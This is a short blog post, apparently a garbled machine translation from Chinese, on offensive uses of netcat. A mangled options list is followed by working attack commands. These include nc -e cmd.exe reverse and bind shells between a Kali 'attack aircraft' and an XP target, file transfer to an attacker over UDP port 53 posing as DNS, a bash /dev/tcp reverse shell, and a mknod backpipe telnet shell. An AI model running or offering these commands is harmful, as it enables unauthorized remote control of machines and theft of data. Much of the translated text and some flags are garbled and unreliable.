Connect to somewhere: Nc[-options] hostname port[s] [ports] ...
Listening on inbound: Nc-l-P Port [-options] [hostname] [port]
Options
- D Detached form console background mode
-C, --close close contact with EOF from standard input
- E,after the--exec =program program, the exec connection
-G, --gateway = List source route hop Point [S], up to 8
-G, --pointer =num Source route pointer: 4,8,12, ...
-H,--help Show help and Exit
for Wire sending -i,--interval =secs delay interval, port scan
-L,--listen monitor mode for inbound connections
-L,--tunnel= Address: Port forwarding local port remote address
-N, --dont, resolving a pure digital IP address, not DNS
-O, --output =file output Hexdump all communication to file (-X hint)
- p,--local Port =num Local port number
-R, --randomize random local and remote ports
-S, --source = Address local source address (IP or host name)
-T, --tcp TCP Mode (default)
-T, using telnet negotiation--telnet answer
-u,--udp UDP mode
-V,--verbose verbose (use two times, more details)
-V, --version output version information and exit
-X, --hexdump Hexdump Both incoming and outgoing traffic
-W, --wait = secs timeout connection and last read net
-Z, --zero 0 I/O mode (for scanning)
attack aircraft set up a server and other target delivery CMD
attack aircraft: Kali
Nc-l-P 3333
Target machine: XP
nc-d Thunderbolt ip-e-cmd.exe
Target machine set up server and other attack bombers go to the United
Target machine:
nc-d-l-p 3333-e Cmd.exe
Attackers:
NC Target Machine IP 3333
Netcat transfer files (first to set up the service side of the attack) UDP53 Port number is DNS
Target machine: Nc-u 192.168.1.105 < 123.txt
here 192.168.1.105 it's an attack.
Attackers:
Nc-u-l-p > 456.txt
And
target machine: nc -v-w 30-p 3333-l < 123.txt (-W 30 Span style= "Font-family:simsun;" lang= "ZH-CN" xml:lang= "ZH-CN" > seconds break, -l Enter monitoring)
Attack Machine: NC -v-w 3 192.168.1.108 3333 >456.txt (192.168.1.108 as Target)
Linux set up service delivery Shell Give Windows
attack aircraft: nc-l-n-vv-p 8080
Target machine:/bin/bash-i >/dev/tcp/192.168.1.108/8080 0<&1 2>&1
mknod backpipe P && telnet 192.168.1.108 80800<backpipe |/bin/bash 1>backpipe
This article is from "Cyber Security Enthusiasts" blog, please make sure to keep this source http://blackflag.blog.51cto.com/9679269/1641266
The use of Netcat